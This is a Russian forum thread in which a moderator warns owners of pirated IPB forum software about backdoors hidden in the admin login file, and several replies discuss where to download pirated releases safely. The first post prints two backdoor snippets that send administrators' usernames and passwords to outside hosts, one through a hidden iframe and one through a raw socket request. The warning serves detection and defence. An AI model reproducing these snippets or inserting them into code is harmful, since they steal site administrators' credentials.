Владельцы нуллов, будьте бдительны!

Статус
В этой теме нельзя размещать новые ответы.

Maybe

Хранитель порядка
Команда форума
Модератор
Регистрация
7 Июл 2008
Сообщения
1.185
Реакции
1.232
  • Автор темы
  • Модер.
  • #1
В последнее время массово взламывались форума линейки IPB разных версий (начиная от 2.2.2), но именно НУЛЛОВ.

Как всегда, мозг человеческий стал думать, как же попадает код от админки третьим лицам. Ведь именно так, взломов по сути не было, входили по коду в админку..

И нашли как и почему.:

1) Смотрим этот файл: /sources/action_admin/login.php

ищем:
Код:
$connector

Если нашли, то имеет такой вид(примерно такой:(

Код:
$connector = '&lt;script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';
   $this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?ad 
(....)

2) Так же может быть другая версия происходящего.
Опять же в этом файле: /sources/action_admin/login.php

Вот код который находили в релизах от DGT:

Код:
//-----------------------------------------
// Lets add some data in here for the access logs...
//-----------------------------------------

$extra_query .= "&member_id=".$mem['id'].'&password=ok';

//-----------------------------------------
// Redirect...
//-----------------------------------------

$fp = @fsockopen('siamogentebuona.altervista.org', 80);
@fputs($fp, "GET /connector.php?site=".urlencode($this->ipsclass->vars['board_url'])."&username=".urlencode($this->ipsclass->input['username'])."&password=".urlencode($this->ipsclass->input['password'])." HTTP/1.1\r\nHost: siamogentebuona.altervista.org\r\n\r\n");
$out = '';
while (!feof($fp)) {
$out .= @fgets ($fp,128);
}
@fclose($fp);

$this->ipsclass->admin->redirect( $this->ipsclass->vars['board_url'].'/'.IPB_ACP_DIRECTORY."/index.".$this->ipsclass->vars['php_ext']."?adsess=".$this->ipsclass->input['adsess']."&".$extra_query, 'Log In Successful' );

exit();
}
}

В итоге пароль попадает в руки, в которых он быть не должен.

Соблюдайте бдительность, ребята!

Всего хорошего.
 
Это проверянная информация? Оо
 
Ну да,некоторые нуллеры пихают в код бекдоры,давно известная инфа

Может стОит составить список нечистоплотных нуллеров? Про DGT учёл, спасибо, буду внимательнее.
 
  • Автор темы
  • Модер.
  • #7
Может стОит составить список нечистоплотных нуллеров? Про DGT учёл, спасибо, буду внимательнее.

Смысла нету. Так как нуллер может быть и нормальный, например та же команда DGT, а кто-то сам уже впаял туда код и пустил на форумах в паблик, или тем же Хрумером прогнал.
Представьте какая база у него соберется, особенно если релиз актуален..
 
Нужно качать нуллы непосредственно у их изготовителей. Как, например, нулл Давидова на этом форуме.
 
Вопрос философский. Небыло бы нулов того же ИПБ, не был бы он так популярен))
 
1. Тема актуальна, отблагодарил. Я бы прикрепил тему в разделе.
2. Качать нулы только от производителей и только с nulled.ws(Как в случае с DLE от Madman или IPB от Davidoff), а не на файлопомойках на которых могут от имени Davidoff или Madman выкладывать всё что угодно...
3. Если проект приносит прибыль ставьте лицензионку, но она сцуко дорогая.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху